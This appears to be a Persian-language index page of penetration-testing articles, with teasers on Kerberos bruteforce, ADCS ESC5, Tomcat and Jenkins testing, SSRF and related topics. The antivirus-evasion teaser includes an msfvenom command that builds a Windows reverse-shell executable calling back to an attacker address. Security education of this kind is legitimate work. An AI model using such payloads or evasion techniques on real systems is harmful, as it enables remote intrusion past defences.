مقالات تست نفوذ
-
بررسی حمله Kerberos Username Bruteforce در Active Directory
در این مقاله، تکنیک بهرهبرداری (Exploitation) موسوم به Kerberos Username Bruteforce یا حمله brute-force پیشاحراز هویت Kerberos مورد بررسی قرار میگیرد. این حمله با سوءاستفاده از پاسخهای پروتکل Kerberos، امکان شناسایی نامهای کاربری معتبر و انجام brute-force برای رمزهای عبور را فراهم میکند. مقاله حاضر روشهای بهرهبرداری و تکنیکهای مقابله را تشریح میکند و آنها را برای شفافیت بیشتر به…
بیشتر بخوانید » -
ADCS ESC5 : آسیبپذیری در کنترل دسترسی به اشیاء زیرساخت کلید عمومی
حمله ESC5 یکی از حملات با ریسک بالا علیه زیرساخت سرویسهای گواهینامهی Active Directory Certificate Services (ADCS) محسوب میشود. این نوع حمله با سوءاستفاده از دسترسی ناایمن به کلید خصوصی مرجع صدور گواهینامه (Certificate Authority – CA) انجام میگیرد. در شرایطی که مهاجم بتواند به سطح دسترسی مدیر محلی (Local Administrator) در سرور CA دست یابد، قادر خواهد بود کلید…
بیشتر بخوانید » -
بررسی ماژول Autorize در نرم افزار Burp Suite
برای محافظت از داراییهای آنلاین، تست امنیتی برنامههای تحت وب یکی از ارکان اساسی در فرآیند ایمنسازی آنها محسوب میشود. ابزار Burp Suite سالهاست که بهعنوان یکی از پیشروترین پلتفرمها در این حوزه شناخته میشود و همچنان توسط کارشناسان امنیت سایبری و هکرهای کلاهسفید (Ethical Hackers) بهطور گسترده مورد استفاده قرار میگیرد. در میان افزونههای مختلفی که در جامعهی تست…
بیشتر بخوانید » -
تست نفوذ Tomcat
Tomcat Penetration Testing نقش حیاتی در شناسایی آسیبپذیریهای موجود در Apache Tomcat ایفا میکند؛ سرویسی که بهطور گسترده بهعنوان یک web server و servlet container در توسعهی برنامههای تحت وب مورد استفاده قرار میگیرد. در ابتدا، Apache Software Foundation این پروژه را با هدف ارائهی یک پلتفرم نمایشی برای فناوریهای Java Servlet و JavaServer Pages (JSP) راهاندازی کرد؛ فناوریهایی که…
بیشتر بخوانید » -
تست نفوذ Jenkins
تست نفوذ Jenkins برای شناسایی آسیبپذیریهای امنیتی در Jenkins ضروری است. Jenkins یک سرور اتوماسیون متنباز است که برای پیادهسازی پیوسته (Continuous Integration – CI) و تحویل پیوسته (Continuous Delivery – CD) استفاده میشود. این ابزار که بر پایه زبان برنامهنویسی جاوا ساخته شده است، از یک پلتفرم اسکریپتنویسی بهره میبرد تا وظایفی مانند ساخت، تست و استقرار در چرخه…
بیشتر بخوانید » -
روشهای عبور از آنتیویروس با بهرهگیری از قالبهای آماده Metasploit و ساخت فایلهای اجرایی سفارشی
در اینجا نگاهی سریع داریم به چند روش ساده برای عبور از شناسایی آنتیویروسها هنگام استفاده از شلکدها. ۴۸ مورد شناسایی از بین ۶۸ آنتیویروس برای تست اولیه، یک پیلود Reverse Shell استاندارد با استفاده از Metasploit برای سیستمهای ۳۲ بیتی ویندوز تولید میکنیم. msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.5 LPORT=443 -f exe > /root/tools/av.exe با بررسی این فایل در سرویس VirusTotal،…
بیشتر بخوانید » -
آموزش جامع ابزار Feroxbuster
Feroxbusterیک ابزار قدرتمند است که برای شناسایی دایرکتوریها (پوشهها) و فایلها روی سرورهای وب با استفاده از تکنیکهای حمله Brute-force طراحی شده است. این ابزار معمولاً در تست نفوذ و ارزیابیهای امنیتی برای شناسایی مسیرها و منابع پنهانشده مورد استفاده قرار میگیرد. در اینجا قصد داریم درباره وظایف و کارهای مختلفی که با استفاده از Feroxbuster میتوان انجام داد، صحبت…
بیشتر بخوانید » -
نصب برنامه در کالی لینوکس
احتمالا میدانید که یکی از مباحثی که در تست نفوذ باید نسبت به آن تسلط بالایی داشته باشید، کار با لینوکس و بهخصوص کالی لینوکس است. یک راه ساده و تاثیرگذار برای یادگرفتن کار با کالی لینوکس هم نصب این سیستم عامل به صورت مجازی یا مستقیم، و استفاده از آن به مدت طولانی است. اما برای کسانی که با…
بیشتر بخوانید » -
SSRF چیست؟ تشریح آسیبپذیری SSRF + دانلود مقاله
در این مقاله توضیح میدهیم حملهی SSRF (کوتاهشدهی Sever-Side Request Forgery) یا «تولید ریکوئستهای سمت سرور» چیست؟ چند نمونهی ساده از آن را تشریح میکنیم، و توضیح میدهیم چطور میتوانید انواع آسیبپذیریهای SSRF را شناسایی و اکسپلویت کنید. SSRF چیست؟ حملات SSRF چه عواقبی دارند؟ انواع رایج حملات SSRF حملات SSRF علیه خود سرور حملات SSRF علیه سیستمهای بکاند دیگر…
بیشتر بخوانید » -
SOP چیست؟
سیاست مبدأ مشترک، Same Origin Policy یا به اختصار SOP، مکانیزمی امنیتی در مرورگررهای وب است که هدف آن جلوگیری از حملهکردن وبسایتها به یکدیگر است. سیاست SOP اجازه نمیدهد اسکریپتهای یک مبدأ (Origin)، به دادههای یک مبدأ دیگر دسترسی داشته باشند. مبدأ یا Origin تشکیل شده از اسکیم URI، دامنه و شماره پورت. برای مثال، URL زیر را در…
بیشتر بخوانید »